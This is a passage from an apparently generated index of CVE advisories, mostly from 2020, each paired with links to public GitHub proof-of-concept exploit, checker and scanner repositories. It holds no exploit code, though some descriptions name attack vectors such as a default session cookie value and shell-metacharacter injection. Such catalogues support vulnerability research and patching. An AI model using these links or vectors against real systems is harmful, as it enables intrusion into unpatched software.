A flaw was found in keycloak in versions prior to 13.0.0. The client registration endpoint allows fetching information about PUBLIC clients (like client secret) without authentication which could be an issue if the same PUBLIC client changed to CONFIDENTIAL later. The highest threat from this vulnerability is to data confidentiality.

- [Cappricio-Securities/CVE-2020-27838](https://github.com/Cappricio-Securities/CVE-2020-27838)

### CVE-2020-27904 (2020-12-08)

A logic issue existed resulting in memory corruption. This was addressed with improved state management. This issue is fixed in macOS Big Sur 11.0.1. An application may be able to execute arbitrary code with kernel privileges.

- [pattern-f/xattr-oob-swap](https://github.com/pattern-f/xattr-oob-swap)

### CVE-2020-27930 (2020-12-08)

A memory corruption issue was addressed with improved input validation. This issue is fixed in macOS Big Sur 11.0.1, watchOS 7.1, iOS 12.4.9, watchOS 6.2.9, Security Update 2020-006 High Sierra, Security Update 2020-006 Mojave, iOS 14.2 and iPadOS 14.2, watchOS 5.3.9, macOS Catalina 10.15.7 Supplemental Update, macOS Catalina 10.15.7 Update. Processing a maliciously crafted font may lead to arbitrary code execution.

- [FunPhishing/Apple-Safari-Remote-Code-Execution-CVE-2020-27930](https://github.com/FunPhishing/Apple-Safari-Remote-Code-Execution-CVE-2020-27930)

### CVE-2020-27935 (2021-04-02)

Multiple issues were addressed with improved logic. This issue is fixed in iOS 14.2 and iPadOS 14.2, macOS Big Sur 11.0.1, watchOS 7.1, tvOS 14.2. A sandboxed process may be able to circumvent sandbox restrictions.

- [LIJI32/SnatchBox](https://github.com/LIJI32/SnatchBox)

### CVE-2020-27949 (2021-04-02)

This issue was addressed with improved checks to prevent unauthorized actions. This issue is fixed in macOS Big Sur 11.1, Security Update 2020-001 Catalina, Security Update 2020-007 Mojave. A malicious application may cause unexpected changes in memory belonging to processes traced by DTrace.

- [seemoo-lab/dtrace-memaccess_cve-2020-27949](https://github.com/seemoo-lab/dtrace-memaccess_cve-2020-27949)

### CVE-2020-27950 (2020-12-08)

A memory initialization issue was addressed. This issue is fixed in macOS Big Sur 11.0.1, watchOS 7.1, iOS 12.4.9, watchOS 6.2.9, Security Update 2020-006 High Sierra, Security Update 2020-006 Mojave, iOS 14.2 and iPadOS 14.2, watchOS 5.3.9, macOS Catalina 10.15.7 Supplemental Update, macOS Catalina 10.15.7 Update. A malicious application may be able to disclose kernel memory.

- [synacktiv/CVE-2020-27950](https://github.com/synacktiv/CVE-2020-27950)
- [lyonzon2/browser-crash-tool](https://github.com/lyonzon2/browser-crash-tool)

### CVE-2020-27955 (2020-11-05)

Git LFS 2.12.0 allows Remote Code Execution.

- [ExploitBox/git-lfs-RCE-exploit-CVE-2020-27955](https://github.com/ExploitBox/git-lfs-RCE-exploit-CVE-2020-27955)
- [ExploitBox/git-lfs-RCE-exploit-CVE-2020-27955-Go](https://github.com/ExploitBox/git-lfs-RCE-exploit-CVE-2020-27955-Go)
- [yhsung/cve-2020-27955-poc](https://github.com/yhsung/cve-2020-27955-poc)
- [r00t4dm/CVE-2020-27955](https://github.com/r00t4dm/CVE-2020-27955)
- [shubham0d/CVE-2020-27955](https://github.com/shubham0d/CVE-2020-27955)
- [TheTh1nk3r/cve-2020-27955](https://github.com/TheTh1nk3r/cve-2020-27955)
- [NeoDarwin/CVE-2020-27955](https://github.com/NeoDarwin/CVE-2020-27955)
- [DeeLMind/CVE-2020-27955-LFS](https://github.com/DeeLMind/CVE-2020-27955-LFS)
- [HK69s/CVE-2020-27955](https://github.com/HK69s/CVE-2020-27955)
- [IanSmith123/CVE-2020-27955](https://github.com/IanSmith123/CVE-2020-27955)
- [Arnoldqqq/CVE-2020-27955](https://github.com/Arnoldqqq/CVE-2020-27955)
- [nob0dy-3389/CVE-2020-27955](https://github.com/nob0dy-3389/CVE-2020-27955)
- [Marsable/CVE-2020-27955-LFS](https://github.com/Marsable/CVE-2020-27955-LFS)
- [FrostsaberX/CVE-2020-27955](https://github.com/FrostsaberX/CVE-2020-27955)
- [whitetea2424/CVE-2020-27955-LFS-main](https://github.com/whitetea2424/CVE-2020-27955-LFS-main)
- [userxfan/cve-2020-27955](https://github.com/userxfan/cve-2020-27955)
- [z50913/CVE-2020-27955](https://github.com/z50913/CVE-2020-27955)
- [Kimorea/CVE-2020-27955-LFS](https://github.com/Kimorea/CVE-2020-27955-LFS)

### CVE-2020-27976 (2020-10-28)

osCommerce Phoenix CE before 1.0.5.4 allows OS command injection remotely. Within admin/mail.php, a from POST parameter can be passed to the application. This affects the PHP mail function, and the sendmail -f option.

- [k0rnh0li0/CVE-2020-27976](https://github.com/k0rnh0li0/CVE-2020-27976)

### CVE-2020-28018 (2021-05-06)

Exim 4 before 4.94.2 allows Use After Free in smtp_reset in certain situations that may be common for builds with OpenSSL.

- [dorkerdevil/CVE-2020-28018](https://github.com/dorkerdevil/CVE-2020-28018)
- [zr0tt/CVE-2020-28018](https://github.com/zr0tt/CVE-2020-28018)

### CVE-2020-28032 (2020-10-31)

WordPress before 5.5.2 mishandles deserialization requests in wp-includes/Requests/Utility/FilteredIterator.php.

- [nth347/CVE-2020-28032_PoC](https://github.com/nth347/CVE-2020-28032_PoC)

### CVE-2020-28052 (2020-12-18)

An issue was discovered in Legion of the Bouncy Castle BC Java 1.65 and 1.66. The OpenBSDBCrypt.checkPassword utility method compared incorrect data when checking the password, allowing incorrect passwords to indicate they were matching with previously hashed ones that were different.

- [madstap/bouncy-castle-generative-test-poc](https://github.com/madstap/bouncy-castle-generative-test-poc)
- [kurenaif/CVE-2020-28052_PoC](https://github.com/kurenaif/CVE-2020-28052_PoC)

### CVE-2020-28054 (2020-11-19)

JamoDat TSMManager Collector version up to 6.5.0.21 is vulnerable to an Authorization Bypass because the Collector component is not properly validating an authenticated session with the Viewer. If the Viewer has been modified (binary patched) and the Bypass Login functionality is being used, an attacker can request every Collector's functionality as if they were a properly logged-in user: administrating connected instances, reviewing logs, editing configurations, accessing the instances' consoles, accessing hardware configurations, etc. Exploiting this vulnerability won't grant an attacker access to nor control of remote ISP servers, as no credentials are sent with the request.

- [VoidSec/Tivoli-Madness](https://github.com/VoidSec/Tivoli-Madness)

### CVE-2020-28148
- [fengchenzxc/CVE-2020-28148](https://github.com/fengchenzxc/CVE-2020-28148)

### CVE-2020-28169 (2020-12-24)

The td-agent-builder plugin before 2020-12-18 for Fluentd allows attackers to gain privileges because the bin directory is writable by a user account, but a file in bin is executed as NT AUTHORITY\SYSTEM.

- [zubrahzz/FluentD-TD-agent-Exploit-CVE-2020-28169](https://github.com/zubrahzz/FluentD-TD-agent-Exploit-CVE-2020-28169)

### CVE-2020-28243 (2021-02-27)

An issue was discovered in SaltStack Salt before 3002.5. The minion's restartcheck is vulnerable to command injection via a crafted process name. This allows for a local privilege escalation by any user able to create files on the minion in a non-blacklisted directory.

- [stealthcopter/CVE-2020-28243](https://github.com/stealthcopter/CVE-2020-28243)

### CVE-2020-28328 (2020-11-06)

SuiteCRM before 7.11.17 is vulnerable to remote code execution via the system settings Log File Name setting. In certain circumstances involving admin account takeover, logger_file_name can refer to an attacker-controlled .php file under the web root.

- [mcorybillington/SuiteCRM-RCE](https://github.com/mcorybillington/SuiteCRM-RCE)

### CVE-2020-28351 (2020-11-09)

The conferencing component on Mitel ShoreTel 19.46.1802.0 devices could allow an unauthenticated attacker to conduct a reflected cross-site scripting (XSS) attack (via the PATH_INFO to index.php) due to insufficient validation for the time_zone object in the HOME_MEETING& page.

- [dievus/CVE-2020-28351](https://github.com/dievus/CVE-2020-28351)

### CVE-2020-28414 (2020-11-12)

A reflected cross-site scripting (XSS) vulnerability exists in the TranzWare Payment Gateway 3.1.12.3.2. A remote unauthenticated attacker is able to execute arbitrary HTML code via crafted url (different vector than CVE-2020-28415).

- [jet-pentest/CVE-2020-28414](https://github.com/jet-pentest/CVE-2020-28414)

### CVE-2020-28415 (2020-11-12)

A reflected cross-site scripting (XSS) vulnerability exists in the TranzWare Payment Gateway 3.1.12.3.2. A remote unauthenticated attacker is able to execute arbitrary HTML code via crafted url (different vector than CVE-2020-28414).

- [jet-pentest/CVE-2020-28415](https://github.com/jet-pentest/CVE-2020-28415)

### CVE-2020-28458 (2020-12-16)

All versions of package datatables.net are vulnerable to Prototype Pollution due to an incomplete fix for https://snyk.io/vuln/SNYK-JS-DATATABLESNET-598806.

- [fazilbaig1/CVE-2020-28458](https://github.com/fazilbaig1/CVE-2020-28458)

### CVE-2020-28478 (2021-01-19)

This affects the package gsap before 3.6.0.

- [NetJBS/CVE-2020-28478--PoC](https://github.com/NetJBS/CVE-2020-28478--PoC)

### CVE-2020-28488
- [rafaelcintralopes/CVE-2020-28488](https://github.com/rafaelcintralopes/CVE-2020-28488)

### CVE-2020-28502 (2021-03-05)

This affects the package xmlhttprequest before 1.7.0; all versions of package xmlhttprequest-ssl. Provided requests are sent synchronously (async=False on xhr.open), malicious user input flowing into xhr.send could result in arbitrary code being injected and run.

- [s-index/CVE-2020-28502](https://github.com/s-index/CVE-2020-28502)
- [dpredrag/CVE-2020-28502](https://github.com/dpredrag/CVE-2020-28502)

### CVE-2020-28647 (2020-11-17)

In Progress MOVEit Transfer before 2020.1, a malicious user could craft and store a payload within the application. If a victim within the MOVEit Transfer instance interacts with the stored payload, it could invoke and execute arbitrary code within the context of the victim's browser (XSS).

- [SECFORCE/Progress-MOVEit-Transfer-2020.1-Stored-XSS-CVE-2020-28647](https://github.com/SECFORCE/Progress-MOVEit-Transfer-2020.1-Stored-XSS-CVE-2020-28647)

### CVE-2020-28653 (2021-02-03)

Zoho ManageEngine OpManager Stable build before 125203 (and Released build before 125233) allows Remote Code Execution via the Smart Update Manager (SUM) servlet.

- [tuo4n8/CVE-2020-28653](https://github.com/tuo4n8/CVE-2020-28653)
- [intrigueio/cve-2020-28653-poc](https://github.com/intrigueio/cve-2020-28653-poc)
- [mr-r3bot/ManageEngine-CVE-2020-28653](https://github.com/mr-r3bot/ManageEngine-CVE-2020-28653)

### CVE-2020-28874 (2021-01-21)

reset-password.php in ProjectSend before r1295 allows remote attackers to reset a password because of incorrect business logic. Errors are not properly considered (an invalid token parameter).

- [varandinawer/CVE-2020-28874](https://github.com/varandinawer/CVE-2020-28874)

### CVE-2020-28926 (2020-11-30)

ReadyMedia (aka MiniDLNA) before version 1.3.0 allows remote code execution. Sending a malicious UPnP HTTP request to the miniDLNA service using HTTP chunked encoding can lead to a signedness bug resulting in a buffer overflow in calls to memcpy/memmove.

- [lorsanta/exploit-CVE-2020-28926](https://github.com/lorsanta/exploit-CVE-2020-28926)

### CVE-2020-28948 (2020-11-19)

Archive_Tar through 1.4.10 allows an unserialization attack because phar: is blocked but PHAR: is not blocked.

- [0x240x23elu/CVE-2020-28948-and-CVE-2020-28949](https://github.com/0x240x23elu/CVE-2020-28948-and-CVE-2020-28949)
- [nopdata/cve-2020-28948](https://github.com/nopdata/cve-2020-28948)
- [JinHao-L/PoC-for-CVE-2020-28948-CVE-2020-28949](https://github.com/JinHao-L/PoC-for-CVE-2020-28948-CVE-2020-28949)

### CVE-2020-29007 (2023-04-15)

The Score extension through 0.3.0 for MediaWiki has a remote code execution vulnerability due to improper sandboxing of the GNU LilyPond executable. This allows any user with an ability to edit articles (potentially including unauthenticated anonymous users) to execute arbitrary Scheme or shell code by using crafted {{Image data to generate musical scores containing malicious code.

- [seqred-s-a/cve-2020-29007](https://github.com/seqred-s-a/cve-2020-29007)

### CVE-2020-29070 (2020-11-25)

osCommerce 2.3.4.1 has XSS vulnerability via the authenticated user entering the XSS payload into the title section of newsletters.

- [aslanemre/cve-2020-29070](https://github.com/aslanemre/cve-2020-29070)

### CVE-2020-29134 (2021-03-05)

The TOTVS Fluig platform allows path traversal through the parameter "file = .. /" encoded in base64. This affects all versions of Fluig Lake 1.7.0, Fluig 1.6.5 and Fluig 1.6.4.

- [Ls4ss/CVE-2020-29134](https://github.com/Ls4ss/CVE-2020-29134)

### CVE-2020-29156 (2020-12-27)

The WooCommerce plugin before 4.7.0 for WordPress allows remote attackers to view the status of arbitrary orders via the order_id parameter in a fetch_order_status action.

- [Ko-kn3t/CVE-2020-29156](https://github.com/Ko-kn3t/CVE-2020-29156)

### CVE-2020-29254 (2020-12-11)

TikiWiki 21.2 allows templates to be edited without CSRF protection. This could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack and perform arbitrary actions on an affected system. The vulnerability is due to insufficient CSRF protections for the web-based management interface of the affected system. An attacker could exploit this vulnerability by persuading a user of the interface to follow a maliciously crafted link. A successful exploit could allow the attacker to perform arbitrary actions on an affected system with the privileges of the user. These actions include allowing attackers to submit their own code through an authenticated user, resulting in local file inclusion. If an authenticated user who is able to edit TikiWiki templates visits a malicious website, template code can be edited.

- [S1lkys/CVE-2020-29254](https://github.com/S1lkys/CVE-2020-29254)

### CVE-2020-29364 (2020-11-30)

In NetArt News Lister 1.0.0, the news headlines are vulnerable to stored XSS attacks. Attackers can inject code into news titles.

- [aslanemre/CVE-2020-29364](https://github.com/aslanemre/CVE-2020-29364)

### CVE-2020-29370 (2020-11-28)

An issue was discovered in kmem_cache_alloc_bulk in mm/slub.c in the Linux kernel before 5.5.11. The slowpath lacks the required TID increment, aka CID-fd4d9c7d0c71.

- [nanopathi/linux-4.19.72_CVE-2020-29370](https://github.com/nanopathi/linux-4.19.72_CVE-2020-29370)

### CVE-2020-29583 (2020-12-22)

Firmware version 4.60 of Zyxel USG devices contains an undocumented account (zyfwp) with an unchangeable password. The password for this account can be found in cleartext in the firmware. This account can be used by someone to log in to the SSH server or web interface with admin privileges.

- [ruppde/scan_CVE-2020-29583](https://github.com/ruppde/scan_CVE-2020-29583)

### CVE-2020-29599 (2020-12-07)

ImageMagick before 6.9.11-40 and 7.x before 7.0.10-40 mishandles the -authenticate option, which allows setting a password for password-protected PDF files. The user-controlled password was not properly escaped/sanitized and it was therefore possible to inject additional shell commands via coders/pdf.c.

- [lnwza0x0a/CVE-2020-29599](https://github.com/lnwza0x0a/CVE-2020-29599)

### CVE-2020-29607 (2020-12-16)

A file upload restriction bypass vulnerability in Pluck CMS before 4.7.13 allows an admin privileged user to gain access in the host through the "manage files" functionality, which may result in remote code execution.

- [0xAbbarhSF/CVE-2020-29607](https://github.com/0xAbbarhSF/CVE-2020-29607)
- [0xN7y/CVE-2020-29607](https://github.com/0xN7y/CVE-2020-29607)

### CVE-2020-29661 (2020-12-09)

A locking issue was discovered in the tty subsystem of the Linux kernel through 5.9.13. drivers/tty/tty_jobctrl.c allows a use-after-free attack against TIOCSPGRP, aka CID-54ffccbf053b.

- [wojkos9/arm-CVE-2020-29661](https://github.com/wojkos9/arm-CVE-2020-29661)
- [TLD1027/CVE-2020-29661](https://github.com/TLD1027/CVE-2020-29661)

### CVE-2020-29666 (2020-12-10)

In Lan ATMService M3 ATM Monitoring System 6.1.0, due to a directory-listing vulnerability, a remote attacker can view log files, located in /websocket/logs/, that contain a user's cookie values and the predefined developer's cookie value.

- [jet-pentest/CVE-2020-29666](https://github.com/jet-pentest/CVE-2020-29666)

### CVE-2020-29667 (2020-12-10)

In Lan ATMService M3 ATM Monitoring System 6.1.0, a remote attacker able to use a default cookie value, such as PHPSESSID=LANIT-IMANAGER, can achieve control over the system because of Insufficient Session Expiration.

- [jet-pentest/CVE-2020-29667](https://github.com/jet-pentest/CVE-2020-29667)

### CVE-2020-29669 (2020-12-14)

In the Macally WIFISD2-2A82 Media and Travel Router 2.000.010, the Guest user is able to reset its own password. This process has a vulnerability which can be used to take over the administrator account and results in shell access. As the admin user may read the /etc/shadow file, the password hashes of each user (including root) can be dumped. The root hash can be cracked easily which results in a complete system compromise.

- [code-byter/CVE-2020-29669](https://github.com/code-byter/CVE-2020-29669)

### CVE-2020-35191 (2020-12-17)

The official drupal docker images before 8.5.10-fpm-alpine (Alpine specific) contain a blank password for the root user. Systems using the drupal docker container deployed by affected versions of the docker image may allow a remote attacker to achieve root access with a blank password.

- [megadimenex/MegaHiDocker](https://github.com/megadimenex/MegaHiDocker)

### CVE-2020-35262 (2021-01-06)

Cross Site Scripting (XSS) vulnerability in Digisol DG-HR3400 can be exploited via the NTP server name in Time and date module and "Keyword" in URL Filter.

- [the-girl-who-lived/CVE-2020-35262](https://github.com/the-girl-who-lived/CVE-2020-35262)

### CVE-2020-35314 (2021-04-20)

A remote code execution vulnerability in the installUpdateThemePluginAction function in index.php in WonderCMS 3.1.3, allows remote attackers to upload a custom plugin which can contain arbitrary code and obtain a webshell via the theme/plugin installer.

- [ybdegit2020/wonderplugin](https://github.com/ybdegit2020/wonderplugin)
- [AkashLingayat/WonderCMS-CVE-2020-35314](https://github.com/AkashLingayat/WonderCMS-CVE-2020-35314)

### CVE-2020-35391 (2021-01-01)

Tenda N300 F3 12.01.01.48 devices allow remote attackers to obtain sensitive information (possibly including an http_passwd line) via a direct request for cgi-bin/DownloadCfg/RouterCfm.cfg, a related issue to CVE-2017-14942. NOTE: the vulnerability report may suggest that either a ? character must be placed after the RouterCfm.cfg filename, or that the HTTP request headers must be unusual, but it is not known why these are relevant to the device's HTTP response behavior.

- [dumitory-dev/CVE-2020-35391-POC](https://github.com/dumitory-dev/CVE-2020-35391-POC)
- [H454NSec/CVE-2020-35391](https://github.com/H454NSec/CVE-2020-35391)

### CVE-2020-35476 (2020-12-16)

A remote code execution vulnerability occurs in OpenTSDB through 2.4.0 via command injection in the yrange parameter. The yrange value is written to a gnuplot file in the /tmp directory. This file is then executed via the mygnuplot.sh shell script. (tsd/GraphHandler.java attempted to prevent command injections by blocking backticks but this is insufficient.)

- [glowbase/CVE-2020-35476](https://github.com/glowbase/CVE-2020-35476)

### CVE-2020-35488 (2021-01-05)

The fileop module of the NXLog service in NXLog Community Edition 2.10.2150 allows remote attackers to cause a denial of service (daemon crash) via a crafted Syslog payload to the Syslog service. This attack requires a specific configuration. Also, the name of the directory created must use a Syslog field. (For example, on Linux it is not possible to create a .. directory. On Windows, it is not possible to create a CON directory.)

- [GuillaumePetit84/CVE-2020-35488](https://github.com/GuillaumePetit84/CVE-2020-35488)
- [githubfoam/nxlog-ubuntu-githubactions](https://github.com/githubfoam/nxlog-ubuntu-githubactions)

### CVE-2020-35489 (2020-12-17)

The contact-form-7 (aka Contact Form 7) plugin before 5.3.2 for WordPress allows Unrestricted File Upload and remote code execution because a filename may contain special characters.

- [dn9uy3n/Check-WP-CVE-2020-35489](https://github.com/dn9uy3n/Check-WP-CVE-2020-35489)
- [X0UCYB3R/Check-WP-CVE-2020-35489](https://github.com/X0UCYB3R/Check-WP-CVE-2020-35489)
- [reneoliveirajr/wp_CVE-2020-35489_checker](https://github.com/reneoliveirajr/wp_CVE-2020-35489_checker)
- [Cappricio-Securities/CVE-2020-35489](https://github.com/Cappricio-Securities/CVE-2020-35489)

### CVE-2020-35498 (2021-02-11)

A vulnerability was found in openvswitch. A limitation in the implementation of userspace packet parsing can allow a malicious user to send a specially crafted packet causing the resulting megaflow in the kernel to be too wide, potentially causing a denial of service. The highest threat from this vulnerability is to system availability.

- [freddierice/cve-2020-35498-flag](https://github.com/freddierice/cve-2020-35498-flag)

### CVE-2020-35545 (2020-12-17)

Time-based SQL injection exists in Spotweb 1.4.9 via the query string.

- [bousalman/CVE-2020-35545](https://github.com/bousalman/CVE-2020-35545)

### CVE-2020-35575 (2020-12-26)

A password-disclosure issue in the web interface on certain TP-Link devices allows a remote attacker to get full administrative access to the web panel. This affects WA901ND devices before 3.16.9(201211) beta, and Archer C5, Archer C7, MR3420, MR6400, WA701ND, WA801ND, WDR3500, WDR3600, WE843N, WR1043ND, WR1045ND, WR740N, WR741ND, WR749N, WR802N, WR840N, WR841HP, WR841N, WR842N, WR842ND, WR845N, WR940N, WR941HP, WR945N, WR949N, and WRD4300 devices.

- [dylvie/CVE-2020-35575-TP-LINK-TL-WR841ND-password-disclosure](https://github.com/dylvie/CVE-2020-35575-TP-LINK-TL-WR841ND-password-disclosure)

### CVE-2020-35590 (2020-12-21)

LimitLoginAttempts.php in the limit-login-attempts-reloaded plugin before 2.17.4 for WordPress allows a bypass of (per IP address) rate limits because the X-Forwarded-For header can be forged. When the plugin is configured to accept an arbitrary header for the client source IP address, a malicious user is not rate-limited when performing a brute force attack, because the client IP header accepts any arbitrary string. When randomizing the header input, the login count never reaches the maximum allowed retries.

- [N4nj0/CVE-2020-35590](https://github.com/N4nj0/CVE-2020-35590)

### CVE-2020-35606 (2020-12-21)

Arbitrary command execution can occur in Webmin through 1.962. Any user authorized for the Package Updates module can execute arbitrary commands with root privileges via vectors involving %0A and %0C. NOTE: this issue exists because of an incomplete fix for CVE-2019-12840.

- [anasbousselham/webminscan](https://github.com/anasbousselham/webminscan)

### CVE-2020-35669 (2020-12-24)

An issue was discovered in the http package through 0.12.2 for Dart. If the attacker controls the HTTP method and the app is using Request directly, it's possible to achieve CRLF injection in an HTTP request.

- [n0npax/CVE-2020-35669](https://github.com/n0npax/CVE-2020-35669)

### CVE-2020-35682 (2021-03-13)

Zoho ManageEngine ServiceDesk Plus before 11134 allows an Authentication Bypass (only during SAML login).

- [its-arun/CVE-2020-35682](https://github.com/its-arun/CVE-2020-35682)

### CVE-2020-35713 (2020-12-26)

Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page.

- [Al1ex/CVE-2020-35713](https://github.com/Al1ex/CVE-2020-35713)

### CVE-2020-35717 (2021-01-01)

zonote through 0.4.0 allows XSS via a crafted note, with resultant Remote Code Execution (because nodeIntegration in webPreferences is true).

- [hmartos/cve-2020-35717](https://github.com/hmartos/cve-2020-35717)
- [Redfox-Secuirty/Hacking-Electron-Apps-CVE-2020-35717-](https://github.com/Redfox-Secuirty/Hacking-Electron-Apps-CVE-2020-35717-)

### CVE-2020-35728 (2020-12-27)

FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool (aka embedded Xalan in org.glassfish.web/javax.servlet.jsp.jstl).

- [Al1ex/CVE-2020-35728](https://github.com/Al1ex/CVE-2020-35728)

### CVE-2020-35729 (2020-12-27)

KLog Server 2.4.1 allows OS command injection via shell metacharacters in the actions/authenticate.php user parameter.

- [Al1ex/CVE-2020-35729](https://github.com/Al1ex/CVE-2020-35729)

### CVE-2020-35749 (2021-01-15)

Directory traversal vulnerability in class-simple_job_board_resume_download_handler.php in the Simple Board Job plugin 2.9.3 and earlier for WordPress allows remote attackers to read arbitrary files via the sjb_file parameter to wp-admin/post.php.

- [M4xSec/Wordpress-CVE-2020-35749](https://github.com/M4xSec/Wordpress-CVE-2020-35749)

### CVE-2020-35846 (2020-12-30)

Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php check function.

- [JohnHammond/CVE-2020-35846](https://github.com/JohnHammond/CVE-2020-35846)
- [0z09e/CVE-2020-35846](https://github.com/0z09e/CVE-2020-35846)

### CVE-2020-35847 (2020-12-30)

Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php resetpassword function.

- [w33vils/CVE-2020-35847_CVE-2020-35848](https://github.com/w33vils/CVE-2020-35847_CVE-2020-35848)

### CVE-2020-36079 (2021-02-26)

Zenphoto through 1.5.7 is affected by authenticated arbitrary file upload, leading to remote code execution. The attacker must navigate to the uploader plugin, check the elFinder box, and then drag and drop files into the Files(elFinder) portion of the UI. This can, for example, place a .php file in the server's uploaded/ directory. NOTE: the vendor disputes this because exploitation can only be performed by an admin who has "lots of other possibilities to harm a site."

- [azizalshammari/CVE-2020-36079.](https://github.com/azizalshammari/CVE-2020-36079.)

### CVE-2020-36109 (2021-02-01)

ASUS RT-AX86U router firmware below version 9.0.0.4_386 has a buffer overflow in the blocking_request.cgi function of the httpd module that can cause code execution when an attacker constructs malicious data.

- [tin-z/CVE-2020-36109-POC](https://github.com/tin-z/CVE-2020-36109-POC)
- [sunn1day/CVE-2020-36109-POC](https://github.com/sunn1day/CVE-2020-36109-POC)

### CVE-2020-36179 (2021-01-06)

FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS.

- [Al1ex/CVE-2020-36179](https://github.com/Al1ex/CVE-2020-36179)

### CVE-2020-36184 (2021-01-06)

FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource.

- [Al1ex/CVE-2020-36184](https://github.com/Al1ex/CVE-2020-36184)

### CVE-2020-36188 (2021-01-06)

FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource.

- [Al1ex/CVE-2020-36188](https://github.com/Al1ex/CVE-2020-36188)

### CVE-2020-36287 (2021-04-09)

The dashboard gadgets preference resource of the Atlassian gadgets plugin used in Jira Server and Jira Data Center before version 8.13.5, and from version 8.14.0 before version 8.15.1 allows remote anonymous attackers to obtain gadget related settings via a missing permissions check.

- [f4rber/CVE-2020-36287](https://github.com/f4rber/CVE-2020-36287)

### CVE-2020-36518 (2022-03-11)

jackson-databind before 2.13.0 allows a Java StackOverflow exception and denial of service via a large depth of nested objects.

- [ghillert/boot-jackson-cve](https://github.com/ghillert/boot-jackson-cve)

### CVE-2020-36603 (2022-09-14)

The HoYoVerse (formerly miHoYo) Genshin Impact mhyprot2.sys 1.0.0.0 anti-cheat driver does not adequately restrict unprivileged function calls, allowing local, unprivileged users to execute arbitrary code with SYSTEM privileges on Microsoft Windows systems. The mhyprot2.sys driver must first be installed by a user with administrative privileges.

- [gmh5225/CVE-2020-36603](https://github.com/gmh5225/CVE-2020-36603)

### CVE-2020-36730 (2023-06-07)

The CMP for WordPress is vulnerable to authorization bypass due to a missing capability check on the cmp_get_post_detail(), niteo_export_csv(), and cmp_disable_comingsoon_ajax() functions in versions up to, and including, 3.8.1. This makes it possible for unauthenticated attackers to read posts, export subscriber lists, and/or deactivate the plugin.

- [RandomRobbieBF/CVE-2020-36730](https://github.com/RandomRobbieBF/CVE-2020-36730)

### CVE-2020-36732 (2023-06-12)

The crypto-js package before 3.2.1 for Node.js generates random numbers by concatenating the string "0." with an integer, which makes the output more predictable than necessary.

- [miguelc49/CVE-2020-36732-2](https://github.com/miguelc49/CVE-2020-36732-2)
- [miguelc49/CVE-2020-36732-1](https://github.com/miguelc49/CVE-2020-36732-1)

### CVE-2020-72381
- [jdordonezn/CVE-2020-72381](https://github.com/jdordonezn/CVE-2020-72381)

### CVE-2020-256480
- [dim0x69/cve-2022-25640-exploit](https://github.com/dim0x69/cve-2022-25640-exploit)

## 2019
### CVE-2019-0053 (2019-07-11)

Insufficient validation of environment variables in the telnet client supplied in Junos OS can lead to stack-based buffer overflows, which can be exploited to bypass veriexec restrictions on Junos OS. A stack-based overflow is present in the handling of environment variables when connecting via the telnet client to remote telnet servers. This issue only affects the telnet client — accessible from the CLI or shell — in Junos OS. Inbound telnet services are not affected by this issue. This issue affects: Juniper Networks Junos OS: 12.3 versions prior to 12.3R12-S13; 12.3X48 versions prior to 12.3X48-D80; 14.1X53 versions prior to 14.1X53-D130, 14.1X53-D49; 15.1 versions prior to 15.1F6-S12, 15.1R7-S4; 15.1X49 versions prior to 15.1X49-D170; 15.1X53 versions prior to 15.1X53-D237, 15.1X53-D496, 15.1X53-D591, 15.1X53-D69; 16.1 versions prior to 16.1R3-S11, 16.1R7-S4; 16.2 versions prior to 16.2R2-S9; 17.1 versions prior to 17.1R3; 17.2 versions prior to 17.2R1-S8, 17.2R2-S7, 17.2R3-S1; 17.3 versions prior to 17.3R3-S4; 17.4 versions prior to 17.4R1-S6, 17.4R2-S3, 17.4R3; 18.1 versions prior to 18.1R2-S4, 18.1R3-S3; 18.2 versions prior to 18.2R1-S5, 18.2R2-S2, 18.2R3; 18.2X75 versions prior to 18.2X75-D40; 18.3 versions prior to 18.3R1-S3, 18.3R2; 18.4 versions prior to 18.4R1-S2, 18.4R2.

- [dreamsmasher/inetutils-CVE-2019-0053-Patched-PKGBUILD](https://github.com/dreamsmasher/inetutils-CVE-2019-0053-Patched-PKGBUILD)

### CVE-2019-0162 (2019-04-17)

Memory access in virtual memory mapping for some microprocessors may allow an authenticated user to potentially enable information disclosure via local access.

- [saadislamm/SPOILER](https://github.com/saadislamm/SPOILER)

### CVE-2019-0192 (2019-03-07)

In Apache Solr versions 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5, the Config API allows to configure the JMX server via an HTTP POST request. By pointing it to a malicious RMI server, an attacker could take advantage of Solr's unsafe deserialization to trigger remote code execution on the Solr side.

- [mpgn/CVE-2019-0192](https://github.com/mpgn/CVE-2019-0192)
- [Rapidsafeguard/Solr-RCE-CVE-2019-0192](https://github.com/Rapidsafeguard/Solr-RCE-CVE-2019-0192)

### CVE-2019-0193 (2019-08-01)

In Apache Solr, the DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true.

- [xConsoIe/CVE-2019-0193](https://github.com/xConsoIe/CVE-2019-0193)
- [jas502n/CVE-2019-0193](https://github.com/jas502n/CVE-2019-0193)
- [1135/solr_exploit](https://github.com/1135/solr_exploit)
- [jaychouzzk/CVE-2019-0193-exp](https://github.com/jaychouzzk/CVE-2019-0193-exp)
- [freeFV/ApacheSolrRCE](https://github.com/freeFV/ApacheSolrRCE)

### CVE-2019-0211 (2019-04-08)

